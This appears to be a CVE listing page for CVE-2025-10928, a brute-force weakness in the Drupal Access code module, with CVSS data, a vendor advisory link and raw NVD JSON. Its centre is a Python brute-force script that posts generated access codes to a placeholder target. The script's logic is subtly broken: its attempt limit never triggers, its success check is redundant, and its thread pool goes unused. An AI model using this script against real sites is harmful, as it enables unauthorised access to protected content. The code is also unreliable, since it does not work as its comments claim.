Security Vulnerability Report
CVE-2025-10928 CVSS 6.3 MEDIUM

CVE-2025-10928

Published: 2025-10-30 00:15:34
Last Modified: 2025-12-12 17:54:27

Description

Improper Restriction of Excessive Authentication Attempts vulnerability in Drupal Access code allows Brute Force. This issue affects Access code: from 0.0.0 before 2.0.5.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:access_code_project:access_code:*:*:*:*:*:drupal:*:* - VULNERABLE
Drupal Access code module 0.0.0 - 2.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10928 Drupal Access code Brute Force PoC
# Affected: Drupal Access code module < 2.0.5
import requests
import itertools
import string
from concurrent.futures import ThreadPoolExecutor

TARGET_URL = "https://target-site.com/drupal/access-code"
MAX_ATTEMPTS = 10000
THREADS = 10


def try_access_code(code):
    """
    Try a single access code against the Drupal Access code endpoint.
    Returns True if the code is valid, False otherwise.
    """
    try:
        response = requests.post(
            TARGET_URL,
            data={'access_code': code},
            timeout=10,
            allow_redirects=False
        )
        # Check for successful authentication indicators
        if response.status_code == 200:
            if 'access granted' in response.text.lower() or response.status_code != 401:
                print(f"[!] Valid access code found: {code}")
                return True
        return False
    except Exception as e:
        print(f"[-] Error trying {code}: {e}")
        return False


def brute_force_attack():
    """
    Perform brute force attack on Drupal Access code module.
    Generates alphanumeric codes and tests them against the target.
    """
    chars = string.ascii_letters + string.digits
    # Generate candidate codes (in production, use more sophisticated generation)
    for length in range(4, 9):
        for code_tuple in itertools.product(chars, repeat=length):
            code = ''.join(code_tuple)
            if try_access_code(code):
                print(f"[+] SUCCESS: Access code is {code}")
                return code
            if len(code) >= MAX_ATTEMPTS:
                break
    print("[-] No valid access code found within attempt limit")
    return None


def main():
    print(f"[*] Starting CVE-2025-10928 brute force attack")
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Max attempts: {MAX_ATTEMPTS}")
    # Using thread pool for parallel requests
    with ThreadPoolExecutor(max_workers=THREADS) as executor:
        result = brute_force_attack()
    if result:
        print(f"[+] Attack successful! Valid code: {result}")


if __name__ == "__main__":
    main()

References

https://www.drupal.org/sa-contrib-2025-108 (Patch, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10928", "sourceIdentifier": "[email protected]", "published": "2025-10-30T00:15:34.060", "lastModified": "2025-12-12T17:54:27.093", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Restriction of Excessive Authentication Attempts vulnerability in Drupal Access code allows Brute Force.This issue affects Access code: from 0.0.0 before 2.0.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:access_code_project:access_code:*:*:*:*:*:drupal:*:*", "versionEndExcluding": "2.0.5", "matchCriteriaId": "ADE0F040-9E8F-4CA4-B3F3-78C46F9B3DAA"}]}]}], "references": [{"url": "https://www.drupal.org/sa-contrib-2025-108", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}